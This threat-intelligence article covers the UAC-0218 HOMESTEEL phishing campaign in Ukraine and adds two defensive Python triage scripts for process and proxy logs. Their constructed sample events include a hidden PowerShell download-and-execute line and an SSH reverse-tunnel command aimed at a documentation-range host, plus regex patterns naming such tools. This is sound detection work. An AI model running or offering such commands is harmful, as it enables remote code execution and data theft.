Introduction

Ukrainian authorities have issued a warning regarding a significant phishing attack orchestrated by the hacking group UAC-0218. This campaign targets Ukrainian citizens, state bodies [2], and military units to exfiltrate sensitive personal data. The attack employs a new malware variant, HOMESTEEL [2] [3] [5], which poses a substantial threat to critical data repositories within government and business networks.

Description

Ukrainian authorities have issued a warning about a large-scale phishing attack attributed to the hacking group UAC-0218, which targets citizens [4] [5], state bodies [2], and military units to steal sensitive personal data. This recent cyber campaign has introduced a new malware variant called HOMESTEEL, aimed at critical Ukrainian data repositories [5], particularly within government and business networks. The attackers primarily use deceptive email subjects such as “invoice” and “details” to lure victims into downloading malicious RAR archives disguised as bills or payment details. These archives contain password-protected decoy documents [2], including files labeled “Contract20102024.doc” and “Invoice20102024.xlsx,” along with a concealed Visual Basic Script (VBS) file named “Password.vbe,” which initiates HOMESTEEL’s data-siphoning operations [5].

HOMESTEEL is designed to search the user’s profile directory for specific file types [2], namely “xls,” “xlsx,” “doc,” “docx,” “pdf,” “txt,” “csv,” “rtf,” “ods,” “odt,” “eml,” “pst,” “rar,” and “zip,” and can scan user directories up to five subfolders deep. The malware exfiltrates files under 10 MB to an attacker-controlled server over HTTP, using both PUT and POST requests; the size limit keeps each upload small enough to evade detection while maximizing the amount of data collected. Each outgoing request includes the full path of the extracted file [5], which helps the attackers catalog sensitive information for potential exploitation or blackmail.

The campaign has been active since at least August 2024 and has reportedly compromised over 100 Ukrainian government computers. It includes a ClickFix-style component that deceives users into clicking malicious links, leading to the execution of a PowerShell command capable of establishing an SSH tunnel, stealing data from web browsers, and launching the Metasploit framework [3]. In a related lure, emails contain a database table and a link that triggers a Google reCAPTCHA bot-detection dialog [1]. When the user confirms they are not a robot, a malicious PowerShell command is copied to the clipboard; the malware only runs if the user then opens the command prompt, pastes the command, and presses Enter [1]. This reliance on user trust underscores the importance of vigilance against such cyber threats, particularly those using AI-enhanced phishing techniques [1].
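The ClickFix chain described above leaves a distinctive process lineage on the endpoint: an interactive cmd.exe (opened by the user, so launched without a /c or /k switch) spawning powershell.exe with a pasted one-liner. The following triage script is an added example, not code from CERT-UA or any of the cited sources. It assumes Sysmon-style process-creation records with the fields Image, ParentImage, ParentCommandLine, CommandLine and User in JSON lines; the sample events are constructed, the 203.0.113.0/24 addresses are a documentation range, and the token list describing what a pasted one-liner tends to contain is an assumption of this example rather than an indicator published for this campaign.

```python
"""Process-creation triage for an interactive cmd.exe -> powershell.exe ClickFix chain.

Added example (not CERT-UA or vendor code). Field names follow Sysmon event ID 1
as an assumption; the sample events below are constructed, not real telemetry.
"""
import json
import re
from typing import Optional

# Assumed heuristics for a pasted one-liner; not indicators from the article.
SIGNALS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("in-memory execution (iex)", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("remote download", re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)),
    ("ssh reverse tunnel", re.compile(r"\bssh\b.*\s-R\s", re.I)),   # article reports an SSH tunnel capability
]
TYPED_LENGTH_LIMIT = 200   # assumption: hand-typed commands are rarely longer than this


def is_interactive_cmd(parent_cmdline: str) -> bool:
    """True when cmd.exe was opened as a console (no /c or /k), i.e. a person
    typed or pasted into it rather than a script invoking it."""
    return re.search(r"(?:^|\s)/[ck]\b", parent_cmdline, re.I) is None


def command_signals(cmdline: str) -> list:
    """Return the names of all heuristics the PowerShell command line triggers."""
    found = [name for name, rx in SIGNALS if rx.search(cmdline)]
    if len(cmdline) > TYPED_LENGTH_LIMIT:
        found.append(f"unusually long for a typed command ({len(cmdline)} chars)")
    return found


def assess_event(ev: dict) -> Optional[dict]:
    """Alert only on the ClickFix lineage: powershell under an interactive cmd.exe."""
    image = str(ev.get("Image", "")).lower()
    parent = str(ev.get("ParentImage", "")).lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return None
    if not parent.endswith("\\cmd.exe") or not is_interactive_cmd(str(ev.get("ParentCommandLine", ""))):
        return None                     # script-launched cmd /c chains belong to other rules
    cmdline = str(ev.get("CommandLine", ""))
    signals = command_signals(cmdline)
    if not signals:
        return None                     # e.g. an admin typing a short cmdlet
    return {
        "time": ev.get("UtcTime"),
        "user": ev.get("User"),
        "severity": "high" if len(signals) >= 2 else "medium",
        "signals": signals,
        "command": cmdline[:120],       # truncated for the alert body
    }


def scan_events(lines) -> list:
    """Run assess_event over JSON-lines input and collect the alerts in order."""
    alerts = []
    for line in lines:
        if line.strip():
            alert = assess_event(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = r"""
{"UtcTime": "2024-10-21 09:14:02", "User": "CORP\\alice", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "CommandLine": "powershell -w hidden -nop -c \"iex (iwr http://203.0.113.7/update.txt -UseBasicParsing).Content\""}
{"UtcTime": "2024-10-21 09:20:45", "User": "CORP\\bob", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "CommandLine": "powershell Get-ChildItem C:\\Temp"}
{"UtcTime": "2024-10-21 09:30:00", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd.exe /c powershell -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUAA=", "CommandLine": "powershell -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUAA="}
{"UtcTime": "2024-10-21 09:41:17", "User": "CORP\\carol", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "CommandLine": "powershell -c \"ssh -N -R 2222:127.0.0.1:3389 svc@203.0.113.7\""}
"""

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS.splitlines()):
        print(json.dumps(alert, indent=2))
```

The interactive-console check is what separates this lineage from scheduled tasks and installers that also run cmd /c powershell; those chains deserve their own rules, which is why the third sample event is deliberately left alone here.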

The control infrastructure for these attacks is characterized by the use of a domain registered with HostZealot and a custom Python-based web server [2], which displays a “Python Software Foundation BaseHTTP 0.6” banner [5], aiding analysts in attributing this campaign to UAC-0218’s infrastructure [5]. The Computer Emergency Response Team of Ukraine (CERT-UA) has not disclosed the attackers’ identities or specific targets [4], but the campaign is believed to be linked to the Russian advanced persistent threat actor APT28 (also known as UAC-0001) [3].
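The exfiltration behaviour described earlier (PUT/POST uploads of documents under 10 MB from the user profile, each request carrying the file's full path) and the server banner noted in the infrastructure paragraph together give a network defender enough to triage egress logs. The script below is an added example, not code from CERT-UA, SOC Prime or any other cited source. It assumes a simplified JSON-lines proxy log with the fields ts, src, dst, method, url, req_bytes, req_headers and server_hdr (map these onto your own proxy's schema), that the banner appears in the HTTP Server response header in the form Python's http.server emits ("BaseHTTP/0.6 Python/x.y"), and, since the article does not say where in the request the path is placed, it looks for a user-profile path anywhere in the URL or request headers. The sample log lines are constructed and use documentation address ranges.

```python
"""Egress-log triage for the HOMESTEEL upload pattern.

Added example (not CERT-UA or vendor code). Log format and sample lines are
constructed; the Server-header form of the banner is an assumption.
"""
import json
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# File types the article reports HOMESTEEL collecting.
TARGET_EXTENSIONS = ("xls", "xlsx", "doc", "docx", "pdf", "txt", "csv",
                     "rtf", "ods", "odt", "eml", "pst", "rar", "zip")
MAX_FILE_BYTES = 10 * 1024 * 1024     # reported "files under 10MB"
MAX_DEPTH = 5                          # reported "up to five subfolders deep"
EXFIL_METHODS = {"PUT", "POST"}        # reported upload methods

# Full Windows user-profile path ending in a targeted extension; group 1 is the
# part below <profile>\ so the subfolder depth can be read off it.
_NAME = r"[^\\/:*?\"<>|\s]+"
PROFILE_PATH_RE = re.compile(
    r"[A-Za-z]:\\Users\\" + _NAME + r"\\((?:" + _NAME + r"\\)*" + _NAME
    + r"\.(?:" + "|".join(TARGET_EXTENSIONS) + r"))(?![\w.])",
    re.IGNORECASE,
)
# Assumption: the reported "Python Software Foundation BaseHTTP 0.6" banner is
# seen as the Server header Python's http.server sends, e.g. "BaseHTTP/0.6 Python/3.11.4".
BANNER_RE = re.compile(r"BaseHTTP[/ ]0\.6", re.IGNORECASE)


def profile_paths(text: str) -> List[Tuple[str, int]]:
    """Return (path, subfolder_depth) for every targeted document path in text,
    after URL-decoding so %5C-encoded backslashes are also caught."""
    return [(m.group(0), m.group(1).count("\\"))
            for m in PROFILE_PATH_RE.finditer(unquote(text))]


def assess_request(entry: dict) -> Optional[dict]:
    """Score one egress log entry; return an alert dict or None."""
    reasons = []
    method = str(entry.get("method", "")).upper()
    paths = []
    if method in EXFIL_METHODS:
        headers = entry.get("req_headers", {}) or {}
        haystack = " ".join([str(entry.get("url", "")), *map(str, headers.values())])
        paths = profile_paths(haystack)
    if paths:
        path, depth = paths[0]
        within = "within" if depth <= MAX_DEPTH else "beyond"
        reasons.append(f"{method} request carries user-profile document path {path} "
                       f"({depth} subfolders deep, {within} the reported scan depth)")
        size = int(entry.get("req_bytes", 0))
        if 0 < size < MAX_FILE_BYTES:
            reasons.append(f"request body of {size} bytes is under the reported 10 MB per-file ceiling")
    server = str(entry.get("server_hdr", ""))
    if BANNER_RE.search(server):
        reasons.append(f"destination answered with the Python BaseHTTP banner {server!r}")
    if not reasons:
        return None
    return {
        "ts": entry.get("ts"),
        "src": entry.get("src"),
        "dst": entry.get("dst"),
        "severity": "high" if len(reasons) >= 2 else "medium",
        "reasons": reasons,
    }


def scan_log(lines) -> List[dict]:
    """Run assess_request over JSON-lines log text and collect alerts in order."""
    alerts = []
    for line in lines:
        if line.strip():
            alert = assess_request(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample log (not real telemetry); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = r"""
{"ts": "2024-10-21T09:14:02Z", "src": "10.20.1.15", "dst": "203.0.113.7", "method": "PUT", "url": "http://203.0.113.7:8000/upload?f=C%3A%5CUsers%5Calice%5CDocuments%5CInvoice20102024.xlsx", "req_bytes": 48213, "req_headers": {"User-Agent": "Mozilla/4.0"}, "server_hdr": "BaseHTTP/0.6 Python/3.11.4"}
{"ts": "2024-10-21T09:14:05Z", "src": "10.20.1.15", "dst": "198.51.100.20", "method": "POST", "url": "https://crm.example.internal/api/tickets", "req_bytes": 912, "req_headers": {"Content-Type": "application/json"}, "server_hdr": "nginx"}
{"ts": "2024-10-21T09:15:11Z", "src": "10.20.1.40", "dst": "203.0.113.7", "method": "GET", "url": "http://203.0.113.7:8000/index.html", "req_bytes": 0, "req_headers": {}, "server_hdr": "BaseHTTP/0.6 Python/3.11.4"}
{"ts": "2024-10-21T09:16:30Z", "src": "10.20.1.22", "dst": "198.51.100.9", "method": "POST", "url": "http://198.51.100.9/", "req_bytes": 1200, "req_headers": {"X-File": "C:\\Users\\bob\\Desktop\\drafts\\notes.txt"}, "server_hdr": "Apache"}
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(json.dumps(alert, indent=2))
```

The path and size checks only fire for PUT/POST, matching the reported upload behaviour, while the banner check runs on any method because a plain GET to a host answering as Python's BaseHTTP is still worth an analyst's attention for attribution. Reading the depth off the matched path lets the analyst see at a glance whether a hit sits inside the five-level scan range the article reports.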

In response to the increasing phishing threats [2], cybersecurity professionals are enhancing their defenses and utilizing tools such as Sigma rules aligned with the MITRE ATT&CK framework to detect UAC-0218 activities and provide actionable threat intelligence for proactive defense against these types of attacks. Victims are encouraged to contact CERT-UA if they suspect they have been targeted [6], highlighting the importance of reporting incidents. The HOMESTEEL campaign raises significant concerns for Ukraine’s government amid ongoing cyber aggression [5], underscoring the evolving nature of cyber espionage tactics and refined phishing methodologies [5].

Conclusion

The HOMESTEEL campaign represents a significant threat to Ukraine’s cybersecurity landscape, highlighting the evolving tactics of cyber espionage and phishing [5]. The impact of such attacks is profound, necessitating enhanced vigilance and robust cybersecurity measures. Mitigation efforts include the use of advanced detection tools and frameworks, as well as prompt reporting of incidents to authorities like CERT-UA. As cyber threats continue to evolve, it is imperative for organizations and individuals to remain informed and proactive in their defense strategies to safeguard sensitive information and maintain national security.

References

[1] https://www.forbes.com/sites/daveywinder/2024/10/26/new-google-cyber-attack-warning-as-russian-apt28-hackers-strike/
[2] https://socprime.com/blog/uac-0218-attack-detection/
[3] https://thehackernews.com/2024/10/cert-ua-identifies-malicious-rdp-files.html
[4] https://www.infosecurity-magazine.com/news/ukraine-phishing-campaign-citizens/
[5] https://thecyberexpress.com/homesteel-malware-emerges-in-ukraine/
[6] https://internetua.com/aferisti-vikradauat-dani-ukrayinciv-vikoristovuuacsi-temu-rahunkiv-